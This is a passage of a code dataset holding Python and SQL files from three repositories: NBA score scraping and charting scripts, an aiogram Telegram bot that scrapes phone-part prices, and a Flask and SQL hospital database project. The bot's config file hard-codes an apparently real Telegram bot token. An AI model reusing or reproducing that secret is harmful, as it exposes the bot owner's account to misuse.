"text": "import sqlite3\nimport json\nimport csv\nimport os\n\n#accepts nothing, returns nothing, outputs 2020_home_ppg file\ndef output_file():\n #set up database\n path = os.path.dirname(os.path.abspath(__file__))\n conn = sqlite3.connect(path+'/'+\"NBA_SCORES\")\n cur = conn.cursor()\n\n #create file to write\n csvfile = '2020_home_ppg.csv'\n with open(csvfile, 'w') as of:\n of = csv.writer(of, delimiter = \",\")\n #create headers\n of.writerow([\"Team\", \"Home_PPG\"])\n\n\n #joins team keys to hom results\n cur.execute(\"SELECT * FROM Team_keys JOIN Scores_2020 ON Team_keys.team_id = Scores_2020.Home_id\")\n\n teams = cur.fetchall()\n \n #created dictionary of team abbrv with points ang games\n d = {}\n for tup in teams:\n sum_ = d.get(tup[1], (0,0))[0] + tup[6]\n n = d.get(tup[1], (0,0))[1] + 1\n\n d[tup[1]] = (sum_, n)\n #converts dictionary entries to file\n for i in d:\n of.writerow([i, (d[i][0]/d[i][1]) ]) \n\n\n\n\n\noutput_file()\n\n \n\n \n \n\n"
},
{
"alpha_fraction": 0.6096398234367371,
"alphanum_fraction": 0.6340042352676392,
"avg_line_length": 27.606060028076172,
"blob_id": "40c5662ba179ef30d99aa9a56ad02e441cf8510c",
"content_id": "cc5061e85928660dad59258936c6afd54ed7279d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 3776,
"license_type": "no_license",
"max_line_length": 180,
"num_lines": 132,
"path": "/gathering_NBA_data.py",
"repo_name": "ethanperlmuttter/PySlammaJamma",
"src_encoding": "UTF-8",
"text": "from bs4 import BeautifulSoup\nimport requests\nimport sqlite3\nimport json\nimport os\nfrom nba_api.stats.static import teams \n\n#creates the database, returns cur and conn paramters\ndef setUpDatabase():\n path = os.path.dirname(os.path.abspath(__file__))\n conn = sqlite3.connect(path+'/'+\"NBA_SCORES\")\n cur = conn.cursor()\n return cur, conn\n\n#takes in cur and conn, produces empty table for 2021 scores, returns nothing\ndef create_table_2021(cur, conn):\n cur.execute(\"DROP TABLE IF EXISTS Scores_2021\")\n cur.execute(\"CREATE TABLE Scores_2021 (game_id INTEGER PRIMARY KEY, Vistor_Score INTEGER, Home_Score INTEGER, Attendance INTEGER)\")\n conn.commit()\n#takes in cur and conn, produces empty table for 2020 scores, returns nothing\ndef create_table_2020(cur,conn):\n\n cur.execute(\"CREATE TABLE IF NOT EXISTS Scores_2020 (game_id INTEGER PRIMARY KEY, Visitor_id INTEGER, Vistor_Score INTEGER, Home_id INTEGER, Home_Score INTEGER, Page INTEGER)\")\n conn.commit()\n\ndef create_team_keys_table(cur, conn):\n cur.execute(\"DROP TABLE IF EXISTS Team_keys\")\n cur.execute(\"CREATE TABLE Team_keys (team_id INTEGER PRIMARY KEY, team_abrv TEXT)\")\n conn.commit()\n\n\n\n\n\n\n\n#accepts cur and conn, populates table from beautiful soup/basketball reference, returns nothing\ndef setUp2021Table(cur, conn):\n months = ['december', 'january', 'february', 'march']\n i = 0\n for month in months:\n url = f\"https://www.basketball-reference.com/leagues/NBA_2021_games-{month}.html\"\n\n r = requests.get(url)\n\n soup = BeautifulSoup(r.text, 'html.parser')\n\n \n table = soup.find('table')\n\n trs = table.find_all('tr')[2:]\n for tr in trs:\n hs = tr.find('td',{'data-stat':'visitor_pts'}).text\n vs = tr.find('td',{'data-stat':'home_pts'}).text\n atten = tr.find('td', {'data-stat':'attendance'}).text\n if atten=='':\n atten = '0'\n cur.execute(\"INSERT INTO Scores_2021 (game_id, Vistor_Score, Home_Score, Attendance) VALUES (?,?,?,?)\", (i, int(vs), int(hs), int(atten.replace(',', '')) ) )\n i+=1\n conn.commit()\n\n\n#accepts cur and conn, populates table from balldontlie, returns nothing\ndef setUp2020Table(cur, conn):\n cur.execute(\"SELECT MAX(Page) FROM Scores_2020\")\n \n n = cur.fetchone()[0]\n if(not n):\n n = 0\n page = n+1\n\n\n #each page contains exactly 25 game results\n r = requests.get(f\"https://www.balldontlie.io/api/v1/games?seasons[]=2019&page={page}\")\n games = json.loads(r.text)\n\n\n for game in games['data']:\n\n\n id_ = game.get('id', 0)\n hs = game.get('home_team_score', 0)\n vs = game.get('visitor_team_score', 0)\n hid = game.get('home_team',None).get('id',0)\n vid = game.get('visitor_team',None).get('id',0)\n cur.execute(\"INSERT INTO Scores_2020 (game_id , Visitor_id, Vistor_Score, Home_id, Home_Score, Page) VALUES (?,?,?,?,?,?)\", (id_, vid, vs, hid, hs, page))\n\n conn.commit()\n\n#accepts cur and conn, populates table from balldontlie to match team keys to names, returns nothing\ndef setUpTeamsTable(cur, conn):\n r = requests.get(\"https://www.balldontlie.io/api/v1/teams\")\n teams = json.loads(r.text)\n\n\n for team in teams['data']:\n\n\n id_ = team.get('id', 0)\n abrv = team.get('abbreviation', None)\n cur.execute(\"INSERT INTO Team_keys (team_id, team_abrv) VALUES (?,?)\", (id_, abrv))\n\n conn.commit()\n\n\n \n \n\n\n \n\n\n\n\n\n\n#def get_records(cur, conn):\n\n\n\n\ndef main():\n cur, conn = setUpDatabase()\n create_team_keys_table(cur,conn)\n create_table_2020(cur, conn)\n setUp2020Table(cur, conn)\n create_table_2021(cur, conn)\n setUp2021Table(cur, 
conn)\n setUpTeamsTable(cur, conn)\n\nif __name__ == \"__main__\":\n main()\n"
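setUp2020Table above relies on the balldontlie pagination contract (at most 25 games per page, resumed via MAX(Page)+1). Below is a small standalone sketch of that contract, assuming network access and that the endpoint used in the file is still live:

```python
import json
import requests

# Fetch one page of 2019-20 season games from the same endpoint used above.
r = requests.get("https://www.balldontlie.io/api/v1/games?seasons[]=2019&page=1")
payload = json.loads(r.text)
print(len(payload["data"]))  # up to 25 game results per page
print(payload["data"][0]["home_team"]["id"])  # nested team object, as used above
```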
},
{
"alpha_fraction": 0.5123584866523743,
"alphanum_fraction": 0.6662046909332275,
"avg_line_length": 65.56922912597656,
"blob_id": "7319bcdbdd0ef0461d12306c8ee07e4220237d69",
"content_id": "55e2d1a32054fe63f80afb37b0f83c6e7c0a315b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4329,
"license_type": "no_license",
"max_line_length": 147,
"num_lines": 65,
"path": "/NBA_visualizations_2020.py",
"repo_name": "ethanperlmuttter/PySlammaJamma",
"src_encoding": "UTF-8",
"text": "import plotly\nimport plotly.graph_objects as go \nimport plotly.express as px\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport os\nimport csv\nimport sqlite3\nimport json\n\n#API data from https://www.balldontlie.io/api/v1/games?seasons[]=2019&page={page}\n#Necessary file imports for Plotly file creation\n\n#Grouped Bar Chart for 2020 Home court PPG averages for all NBA teams\n#Grouped Bar Chart Plotly creation and line by line bar development for each NBA team, pulling\n#home court PPG averages from API gather\n\nteams = [\"NBA Team\"]\n\nfig = go.Figure(data=[\n go.Bar(name='Atlanta Hawks', x=teams, y=[114.58823529411765], marker_color = 'rgb(225,68,52)'),\n go.Bar(name='Boston Celtics', x=teams, y=[117.05714285714286], marker_color = 'rgb(0,122,51)' ),\n go.Bar(name='Brooklyn Nets', x=teams, y=[112.38888888888889], marker_color = 'rgb(0,0,0)'),\n go.Bar(name='Charlotte Hornets', x=teams, y=[104.2258064516129], marker_color = 'rgb(29,17,96)'),\n go.Bar(name='Chicago Bulls', x=teams, y=[106.11764705882354], marker_color = 'rgb(206,17,65)'),\n go.Bar(name='Clevland Cavaliers', x=teams, y=[108.55555555555556], marker_color = 'rgb(134,0,56)'),\n go.Bar(name='Dallas Mavericks', x=teams, y=[117.71052631578948], marker_color = 'rgb(0,83,188)'),\n go.Bar(name='Denver Nuggets', x=teams, y=[111.86111111111111], marker_color = 'rgb(13,34,64)'),\n go.Bar(name='Detroit Pistons', x=teams, y=[109.3030303030303], marker_color = 'rgb(200,16,46)'),\n go.Bar(name='Golden State Warriors', x=teams, y=[106.97058823529412], marker_color = 'rgb(29,66,138)'),\n go.Bar(name='Houston Rockets', x=teams, y=[119.0], marker_color = 'rgb(206,17,65)'),\n go.Bar(name='Indiana Pacers', x=teams, y=[110.75], marker_color = 'rgb(0,45,98)'),\n go.Bar(name='Los Angeles Clippers', x=teams, y=[117.76470588235294], marker_color = 'rgb(200,16,46)'),\n go.Bar(name='Los Angeles Lakers', x=teams, y=[113.58823529411765], marker_color = 'rgb(85,37,130)'),\n go.Bar(name='Memphis Grizzlies', x=teams, y=[113.19444444444444], marker_color = 'rgb(93,118,169)'),\n go.Bar(name='Miami Heat', x=teams, y=[115.75], marker_color = 'rgb(152,0,46)'),\n go.Bar(name='Milwaukee Bucks', x=teams, y=[120.97222222222223], marker_color = 'rgb(0,71,27)'),\n go.Bar(name='Minnesota Timberwolves', x=teams, y=[110.125], marker_color = 'rgb(12,35,64)'),\n go.Bar(name='New Orleans Pelicans', x=teams, y=[117.58333333333333], marker_color = 'rgb(180,151,90)'),\n go.Bar(name='New York Knicks', x=teams, y=[105.39393939393939], marker_color = 'rgb(0,107,182)'),\n go.Bar(name='Oklahoma City Thunder', x=teams, y=[113.16666666666667], marker_color = 'rgb(239,59,36)'),\n go.Bar(name='Orlando Magic', x=teams, y=[106.05714285714286], marker_color = 'rgb(0,125,197)'),\n go.Bar(name='Philadelphia 76ers', x=teams, y=[113.44117647058823], marker_color = 'rgb(237,23,76)'),\n go.Bar(name='Phoenix Suns', x=teams, y=[114.48717948717949], marker_color = 'rgb(29,17,96)'),\n go.Bar(name='Portland Trail Blazers', x=teams, y=[117.33333333333333], marker_color = 'rgb(224,58,62)'),\n go.Bar(name='Sacramento Kings', x=teams, y=[110.37142857142857], marker_color = 'rgb(91,43,130)'),\n go.Bar(name='San Antonio Spurs', x=teams, y=[114.73529411764706], marker_color = 'rgb(196,206,211)'),\n go.Bar(name='Toronto Raptors', x=teams, y=[114.97142857142858], marker_color = 'rgb(206,17,65)'),\n go.Bar(name='Utah Jazz', x=teams, y=[111.48571428571428], marker_color = 'rgb(0,71,27)'),\n go.Bar(name='Washington Wizards', x=teams, y=[114.0], marker_color = 
'rgb(0,43,92)'),\n])\n# To alter bar presentation/add in title text and external features\nfig.update_layout(barmode='group')\nfig.update_layout(title_text='NBA 2020 Pre-COVID-19 Home Team PPG Averages')\nfig.show()\n\n#df = csv.read_csv(\"2020_home_ppg.csv\")\n#df = df[df['team_name'] == \"Atlanta Hawks\", \"Boston Celtics\", \"Brooklyn Nets\", \"Charlotte Hornets\", \"Chicago Bulls\", \"Cleveland Cavaliers\",\n#\"Dallas Mavericks\", \"Denver Nuggets\", \"Detroit Pistions\", \"Golden State Warriors\", \"Houston Rockets\", \"Indiana Pacers\", \"Los Angeles Clippers\",\n#\"Los Angeles Lakers\", \"Memphis Grizzlies\", \"Miami Heat\", \"Milwaukee Bucks\", \"Minnesota Timberwolves\", \"New Orleans Pelicans\", \"New York Knicks\",\n#\"Oklahoma City Thunder\", \"Orlando Magic\", \"Philadelphia 76ers\", \"Phoenix Suns\", \"Portland Trail Blazers\", \"Sacramento Kings\", \"San Antonio Spurs\",\n#\"Toronto Raptors\", \"Utah Jazz\", \"Washington Wizards\"]\n#df = df.groupby(['month', 'team_name'], as_index=False)[['Home_PPG']].avg()\n#print (df[:30])\n\n\n"
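The commented-out block at the end of this file gestures at reading 2020_home_ppg.csv (written by NBA_homecourt.py) instead of hard-coding the averages. Below is a working sketch of that idea, assuming the CSV exists with the Team/Home_PPG header shown earlier; the plotly-express call is illustrative, not the authors' code:

```python
import csv

import plotly.express as px

# Read the Team / Home_PPG rows produced by NBA_homecourt.py.
team_names, ppgs = [], []
with open("2020_home_ppg.csv") as f:
    for row in csv.DictReader(f):
        team_names.append(row["Team"])
        ppgs.append(float(row["Home_PPG"]))

# One bar per team, replacing the hand-copied y-values above.
fig = px.bar(x=team_names, y=ppgs,
             labels={"x": "NBA Team", "y": "Home PPG"},
             title="NBA 2020 Pre-COVID-19 Home Team PPG Averages")
fig.show()
```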
}
] | 6 |
F-WJ/ArticleSpider
|
https://github.com/F-WJ/ArticleSpider
|
35572484617cb0519533c05c9e9bd01e4563d50d
|
662fbd5cb4eadb8a8172551ecb56819c310c4a89
|
83454253dbd9f417fa7d787b9347bd5b42699cd5
|
refs/heads/master
| 2021-01-20T09:20:38.371943 | 2017-05-13T08:17:56 | 2017-05-13T08:17:56 | 90,240,833 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6453201770782471,
"alphanum_fraction": 0.6477832794189453,
"avg_line_length": 26.86206817626953,
"blob_id": "70be114a21142dc715df8d2bbcb5655d88e41461",
"content_id": "7b4f87c42aaed184bd47c3fed704a1e981c06d6e",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 928,
"license_type": "no_license",
"max_line_length": 59,
"num_lines": 29,
"path": "/ArticleSpider/items.py",
"repo_name": "F-WJ/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\n\n# Define here the models for your scraped items\n#\n# See documentation in:\n# http://doc.scrapy.org/en/latest/topics/items.html\n\nimport scrapy\n\n\nclass ArticlespiderItem(scrapy.Item):\n # define the fields for your item here like:\n # name = scrapy.Field()\n pass\n\n\nclass JobBoleArticleItem(scrapy.Item):\n # items只有Field类型\n title = scrapy.Field() # 文章标题\n create_date = scrapy.Field() # 创建文章时间\n url = scrapy.Field() # 文章地址\n url_object_id = scrapy.Field() # 将url变成固定长度(将url变成md5)\n front_image_url = scrapy.Field() # 封面图\n front_image_path = scrapy.Field() # 图片本地存放地址\n praise_nums = scrapy.Field() # 点赞数\n comment_nums = scrapy.Field() # 评论数\n fav_nums = scrapy.Field() # 收藏数\n tags = scrapy.Field() # 文章标签\n content = scrapy.Field() # 文章内容\n\n\n\n\n"
},
{
"alpha_fraction": 0.5435356497764587,
"alphanum_fraction": 0.5857519507408142,
"avg_line_length": 20.05555534362793,
"blob_id": "1c684de679cd0510eb36040b86e284161f513517",
"content_id": "5ec7f2b237cc7bc44d2706432d16606aec9c9286",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 409,
"license_type": "no_license",
"max_line_length": 56,
"num_lines": 18,
"path": "/ArticleSpider/utils/common.py",
"repo_name": "F-WJ/ArticleSpider",
"src_encoding": "UTF-8",
"text": "# _*_ coding: utf-8 _*_\n__author__ = 'FWJ'\n__date__ = '17-5-2 下午8:02'\nimport hashlib\n\n\n# 将url变成md5\ndef get_md5(url):\n # 在python中,str就是unicode\n if isinstance(url, str):\n url = url.encode()\n m = hashlib.md5()\n m.update(url)\n return m.hexdigest()\n\n# python3要转utf8编码,python2不用\nif __name__ == \"__main__\":\n print(get_md5(\"http://jobbole.com\".encode(\"utf-8\")))\n"
}
] | 2 |
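For context, a sketch of how the JobBoleArticleItem and the get_md5 helper above are typically wired together inside a Scrapy parse callback; the imports assume this repo's package layout, and the CSS selector is purely illustrative:

from ArticleSpider.items import JobBoleArticleItem
from ArticleSpider.utils.common import get_md5

def parse_detail(response):
    item = JobBoleArticleItem()
    item["url"] = response.url
    item["url_object_id"] = get_md5(response.url)  # fixed-length md5 key for the url
    item["title"] = response.css("h1.entry-title::text").get()  # illustrative selector
    yield item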
dazzeew/Async_bot
|
https://github.com/dazzeew/Async_bot
|
de83a2f778a2f130ffad026c61e5ac8b342a1fc4
|
01bbd0d46144d312d4f1fa2c25504048f57e02c9
|
e1f8f35b065d98d4f790b41308a96e9fa2953651
|
refs/heads/main
| 2023-05-30T13:23:32.688819 | 2021-06-14T16:52:31 | 2021-06-14T16:52:31 | 376,894,588 | 0 | 0 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6323529481887817,
"alphanum_fraction": 0.6323529481887817,
"avg_line_length": 32,
"blob_id": "fa48cc1105bdab591db11e47f9c64feabf8cfad4",
"content_id": "41b482fb3ed66211903247f03a596d2c48fb6cc0",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 68,
"license_type": "no_license",
"max_line_length": 49,
"num_lines": 2,
"path": "/config.py",
"repo_name": "dazzeew/Async_bot",
"src_encoding": "UTF-8",
"text": "TOKEN = '1787109082:AAGeLqF-PJ-QpVtUYAkdIhZGZk36v_eaZjk'\r\ndef_url = \"https://novosibirsk.moba.ru/catalog/?\"\r\n"
},
{
"alpha_fraction": 0.6821106672286987,
"alphanum_fraction": 0.7168596982955933,
"avg_line_length": 28.84000015258789,
"blob_id": "03245744705979be69105fdbd92c37e744eabe68",
"content_id": "dfc51881c524ba05c6f8a51ec1c8a8fcc73d011c",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 838,
"license_type": "no_license",
"max_line_length": 53,
"num_lines": 25,
"path": "/keyboards.py",
"repo_name": "dazzeew/Async_bot",
"src_encoding": "UTF-8",
"text": "from aiogram.types import ReplyKeyboardRemove, \\\r\n ReplyKeyboardMarkup, KeyboardButton\r\nmascom = ['Дисплей','Аккумулятор','Защитное стекло']\r\n\r\ndef main_keyboard():\r\n\tmain_kb = ReplyKeyboardMarkup(resize_keyboard=True)\r\n\tbtn1_1 = KeyboardButton(mascom[0])\r\n\tbtn1_2 = KeyboardButton(mascom[1])\r\n\tbtn1_3 = KeyboardButton(mascom[2])\r\n\tmain_kb.add(btn1_1,btn1_2).add(btn1_3)\r\n\treturn main_kb\r\n\r\ndef fstep_keyboard():\r\n\tfstep_kb = ReplyKeyboardMarkup(resize_keyboard=True)\r\n\tbtn2_1 = KeyboardButton('В главное меню')\r\n\tbtn2_2 = KeyboardButton('Назад')\r\n\tfstep_kb.add(btn2_1).add(btn2_2)\r\n\treturn fstep_kb\r\n\r\n\r\ndef sstep_keyboard():\r\n\tsstep_kb = ReplyKeyboardMarkup(resize_keyboard=True)\r\n\tbtn3_1 = KeyboardButton('В главное меню')\r\n\tsstep_kb.add(btn3_1)\r\n\treturn sstep_kb\r\n\r\n\r\n\r\n"
},
{
"alpha_fraction": 0.6814576387405396,
"alphanum_fraction": 0.6856718063354492,
"avg_line_length": 36.769229888916016,
"blob_id": "49e37f3bb8e337898bd403e2d9248803d4041c4b",
"content_id": "a38b18e1343e93ebcec7b19e9ab7adf2d404f879",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4422,
"license_type": "no_license",
"max_line_length": 121,
"num_lines": 104,
"path": "/bot.py",
"repo_name": "dazzeew/Async_bot",
"src_encoding": "UTF-8",
"text": "from config import TOKEN\r\nfrom keyboards import main_keyboard, fstep_keyboard, sstep_keyboard, mascom\r\nfrom functions import url, Parcer, send_telegram\r\nfrom states_class import steps\r\n\r\n\r\nimport time\r\nfrom aiogram import Bot, Dispatcher, types, executor\r\nfrom aiogram.dispatcher import FSMContext\r\nfrom aiogram.dispatcher.filters.state import State\r\nfrom aiogram.contrib.fsm_storage.memory import MemoryStorage\r\nimport aiogram\r\n\r\nbot = Bot(TOKEN, parse_mode = 'HTML')\r\ndp = Dispatcher(bot, storage=MemoryStorage())\r\nchange_letter = 'Введите модель телефона или выберите команду'\r\n\r\nasync def anti_flood(*args, **kwargs):\t\r\n m = args[0]\r\n await m.answer(\"Не флуди :)\")\r\n\r\n\r\n\r\[email protected]_handler(commands = 'start', state = '*')\r\[email protected](anti_flood,rate=3)\r\nasync def wasup(message):\r\n\tawait message.reply(text = 'Привет, я пытаюсь заработать...\\nВыбери что-то из меню', reply_markup = main_keyboard())\r\n\tawait steps.change_zch.set()\r\n\r\[email protected]_handler(content_types = ['text'], state = steps.change_zch)\r\[email protected](anti_flood,rate=3)\r\nasync def main_change(message, state: FSMContext):\r\n\tif message.text == mascom[0]:\r\n\t\tawait message.answer(text = change_letter, reply_markup = sstep_keyboard())\r\n\t\tawait state.update_data(id = 'section_id=93&q=')\r\n\t\tawait steps.confirm_pars.set()\r\n\telif message.text == mascom[1]:\r\n\t\tawait message.answer(text = change_letter, reply_markup = sstep_keyboard())\r\n\t\tawait state.update_data(id = 'section_id=95&q=')\r\n\t\tawait steps.confirm_pars.set()\r\n\telif message.text == mascom[2]:\r\n\t\tawait message.answer(text = change_letter, reply_markup = sstep_keyboard())\r\n\t\tawait state.update_data(id = '&q=защитное+стекло+')\r\n\t\tawait steps.confirm_pars.set()\r\n\telse:\r\n\t\tawait message.answer(text = 'Упс....', reply_markup = main_keyboard())\r\n\t\treturn\r\n\r\n\r\[email protected]_handler(content_types = ['text'], state = steps.confirm_pars)\r\[email protected](anti_flood,rate=3)\r\nasync def pars_model(message, state: FSMContext):\r\n\tif message.text == 'В главное меню':\r\n\t\tawait message.answer(text = 'Выберите что-то из меню', reply_markup = main_keyboard())\r\n\t\tawait steps.change_zch.set()\r\n\telse:\r\n\t\tuser_data = await state.get_data()\r\n\t\tnew_url = url(message.text, user_data['id'])\r\n\t\tawait state.update_data(url = new_url)\r\n\t\tdictname = await Parcer(new_url)\r\n\t\tif dictname == {}:\r\n\t\t\tawait message.reply(text = 'К сожалению такой запчасти нету, попробуйте снова или нажмите вернитесь в главное меню')\r\n\t\t\treturn\r\n\t\tcounter = 1\r\n\t\tinfo = ''\r\n\t\tfor i in dictname:\r\n\t\t\t\tinfo += str(counter) + '. 
' + i + ' \\n' + dictname.get(i)[1].text + '\\n\\n'\r\n\t\t\t\tcounter += 1\r\n\t\tinfo += 'Отправьте в чат номер запчасти, цену на замену которой вы бы хотели узнать'\r\n\t\tawait message.answer(text = info, reply_markup = fstep_keyboard())\r\n\t\tawait steps.choice_number.set()\r\n\r\[email protected]_handler(content_types = ['text'], state = steps.choice_number)\r\[email protected](anti_flood,rate=3)\r\nasync def number_detail(message, state: FSMContext):\r\n\tif message.text == 'В главное меню':\r\n\t\tawait message.answer(text = 'Выберите что-то из меню', reply_markup = main_keyboard())\r\n\t\tawait steps.change_zch.set()\r\n\telif message.text == 'Назад':\r\n\t\tawait message.reply(text = 'Введите модель телефона', reply_markup = sstep_keyboard())\r\n\t\tawait steps.confirm_pars.set()\r\n\telse:\r\n\t\tuser_data = await state.get_data()\r\n\t\tdictname = await Parcer(user_data['url'])\r\n\t\tcheck = True\r\n\t\tfor i in range(len(dictname)):\r\n\t\t\tif message.text == str(i + 1):\r\n\t\t\t\tcheck = False\r\n\t\t\t\tbreak\r\n\t\tif check:\r\n\t\t\tawait message.reply(text = 'Такого номера запчасти нет!!', reply_markup = fstep_keyboard())\r\n\t\t\treturn\r\n\t\tor_price = ['skip']\r\n\t\tfor i in dictname:\r\n\t\t\tor_price.append(i + ' (' + dictname.get(i)[0].text.replace(\" \", \"\") + \"Рублей)\\n\\n\")\r\n\t\tsend_orientir = str(or_price[int(message.text)])\r\n\t\tsend_telegram(str(or_price[int(message.text)]))\r\n\t\tawait message.answer(text = send_orientir + 'Для просмотра других цен, введите цифру', reply_markup = fstep_keyboard())\r\n\t\treturn\r\n\r\n\r\n\r\nif __name__ == '__main__':\r\n\texecutor.start_polling(dp)\r\n\r\n"
},
{
"alpha_fraction": 0.7235293984413147,
"alphanum_fraction": 0.7235293984413147,
"avg_line_length": 26,
"blob_id": "64531c764323a6d4123187ef0ec9c9b1f50a6d8e",
"content_id": "aff52f691373635e54f9bc7f6038b28b58f62d73",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 170,
"license_type": "no_license",
"max_line_length": 63,
"num_lines": 6,
"path": "/states_class.py",
"repo_name": "dazzeew/Async_bot",
"src_encoding": "UTF-8",
"text": "from aiogram.dispatcher.filters.state import State, StatesGroup\r\n\r\nclass steps(StatesGroup):\r\n\tchange_zch = State()\r\n\tconfirm_pars = State()\r\n\tchoice_number = State()\r\n\r\n"
},
{
"alpha_fraction": 0.8113207817077637,
"alphanum_fraction": 0.8113207817077637,
"avg_line_length": 52,
"blob_id": "f731a8de25c970241495f09be74cb4c181c9bc1c",
"content_id": "6f5f23c76141e7706250325540e330baaff180d5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 184,
"license_type": "no_license",
"max_line_length": 93,
"num_lines": 2,
"path": "/README.md",
"repo_name": "dazzeew/Async_bot",
"src_encoding": "UTF-8",
"text": "# Async_bot\nМеханизм парсинга и словаря во втором случае реализован убого, тк он каждый раз парсит заново\n"
},
{
"alpha_fraction": 0.5966697335243225,
"alphanum_fraction": 0.6003700494766235,
"avg_line_length": 21.45652198791504,
"blob_id": "e1e13766a5be7dcd5ce4706e62a88650d648d86e",
"content_id": "63acb239b8275accf22aa3fe540ceb229ef74bbf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 1081,
"license_type": "no_license",
"max_line_length": 60,
"num_lines": 46,
"path": "/functions.py",
"repo_name": "dazzeew/Async_bot",
"src_encoding": "UTF-8",
"text": "from config import def_url\r\nfrom bs4 import BeautifulSoup\r\nimport requests\r\nfrom aiogram import types\r\nimport time\r\n\r\nfrom config import TOKEN\r\n\r\n\r\n\r\ndef url(text,id_pars):\r\n\tmodel = ''\r\n\tfor i in range(len(text)):\r\n\t\tif text[i] == ' ':\r\n\t\t\tmodel += '+'\r\n\t\telse: \r\n\t\t\tmodel += text[i]\r\n\tnew_url = def_url + id_pars + model + '&how=r'\r\n\treturn new_url\r\n\r\nasync def Parcer(url):\r\n\tdictname = dict()\r\n\tsoup = BeautifulSoup(requests.get(url).text, 'html.parser')\r\n\tname = soup.find_all('a', class_=\"dark_link\")\r\n\tprice = soup.find_all('span', class_=\"price_value\")\r\n\tavailability = soup.find_all('div', class_=\"item-stock\")\r\n\tfor i in range(len(price)):\r\n\t\tdictname[name[i].text] = [price[i], availability[i]]\r\n\treturn dictname \r\n\r\n\r\n\r\n\r\ndef send_telegram(text: str):\r\n url = \"https://api.telegram.org/bot\"\r\n channel_id = \"@testbot_mic\"\r\n url += TOKEN\r\n method = url + \"/sendMessage\"\r\n\r\n r = requests.post(method, data={\r\n \"chat_id\": channel_id,\r\n \"text\": text\r\n })\r\n\r\n if r.status_code != 200:\r\n raise Exception(\"post_text error\")\r\n\r\n"
}
] | 6 |
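The README above notes that the bot re-parses the catalog on every message. A minimal sketch of the usual fix with aiogram's FSMContext, as already used in bot.py: snapshot the parsed prices into state once and read them back later instead of calling Parcer again (the helper names and the 'prices' state key are introduced here for illustration):

from aiogram.dispatcher import FSMContext

async def cache_prices(state: FSMContext, dictname):
    # dictname is the dict returned by Parcer(): name -> [price_tag, availability_tag]
    prices = {name: (tags[0].text, tags[1].text) for name, tags in dictname.items()}
    await state.update_data(prices=prices)

async def cached_prices(state: FSMContext):
    user_data = await state.get_data()
    return user_data.get("prices", {})

Because only plain strings are stored, this works unchanged with the MemoryStorage configured in bot.py.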
LEOBox/FinalProject
|
https://github.com/LEOBox/FinalProject
|
e62ab82d3baf502b4f0ce80d09cf546ec6ba0c59
|
a4e001f66d584aa9e0a03f8aa7fb075181e512df
|
2a86ba2c71fa1bcda5eb6af9cc899d59848521fb
|
refs/heads/master
| 2021-01-01T03:35:51.836901 | 2016-04-29T16:44:21 | 2016-04-29T16:44:21 | 56,215,224 | 0 | 1 | null | null | null | null | null |
[
{
"alpha_fraction": 0.6589326858520508,
"alphanum_fraction": 0.6612529158592224,
"avg_line_length": 17.782608032226562,
"blob_id": "cd294b4390a115a4ebfd942a188708280d32457c",
"content_id": "b40cdaccefea39c6174d6413f133790ee9bc2004",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 431,
"license_type": "no_license",
"max_line_length": 40,
"num_lines": 23,
"path": "/Front-End/webserver.py",
"repo_name": "LEOBox/FinalProject",
"src_encoding": "UTF-8",
"text": "# -*- coding: utf-8 -*-\nfrom flask import Flask,render_template\n\napp = Flask(__name__)\n\[email protected]('/')\ndef function():\n\treturn render_template('index.html')\n\[email protected]('/login')\ndef login():\n\treturn render_template('login.html')\n\[email protected]('/register')\ndef register():\n\treturn render_template('register.html')\n\[email protected]('/bill')\ndef bill():\n\treturn render_template('bill.html')\n\nif __name__ == '__main__':\n\tapp.run(debug=True)"
},
{
"alpha_fraction": 0.697762668132782,
"alphanum_fraction": 0.7557241916656494,
"avg_line_length": 38.97382354736328,
"blob_id": "fdc4898c26a3169b209c62c250a306c386f2388c",
"content_id": "4de23e2523b323ead28a705595e2638da5bafee1",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "SQL",
"length_bytes": 7643,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 191,
"path": "/LOGINS,GRANT.sql",
"repo_name": "LEOBox/FinalProject",
"src_encoding": "UTF-8",
"text": "/*Stored procedure or function on nurseschedule table*/\n/*If nurse enter her id and password then if she wants to check her shift timings*/\nuse hospital;\nselect * from Nurse;\nselect * from NurseSchedule;\ncreate proc dbo.NurseTimings\n@Id nvarchar(20)\nAS\nselect Nurse.Nurse_ID,FirstName,LastName,StartTime,EndTime,Date\nfrom Nurse inner join NurseSchedule on Nurse.Nurse_ID = NurseSchedule.Nurse_ID\nwhere Nurse.Nurse_ID = @Id;\n\nEXEC dbo.NurseTimings 5;\n\n\n/* Using functions*/\ncreate function fnnurseshifttime\n (@Id nvarchar(20))\n returns table\n\nreturn\n (select Nurse.Nurse_ID,FirstName,LastName,StartTime,EndTime,Date\nfrom Nurse inner join NurseSchedule on Nurse.Nurse_ID = NurseSchedule.Nurse_ID\nwhere Nurse.Nurse_ID = @Id)\n\nselect * from\nfnnurseshifttime(6);\n/*If nurse wants to check the health attributes of patient along with his details*/\nuse hospital;\nselect * from Health_Attribute;\ncreate proc dbo.ChkPatientHealthDetails\n@Id nvarchar(20)\nAS\nselect Patient.Patient_ID,FirstName,LastName,Systolic_BP,Diastolic_BP,BloodSugar,Pulse\nfrom Health_Attribute inner join Patient on Patient.Patient_ID=Health_Attribute.Patient_ID\nwhere Patient.Patient_ID = 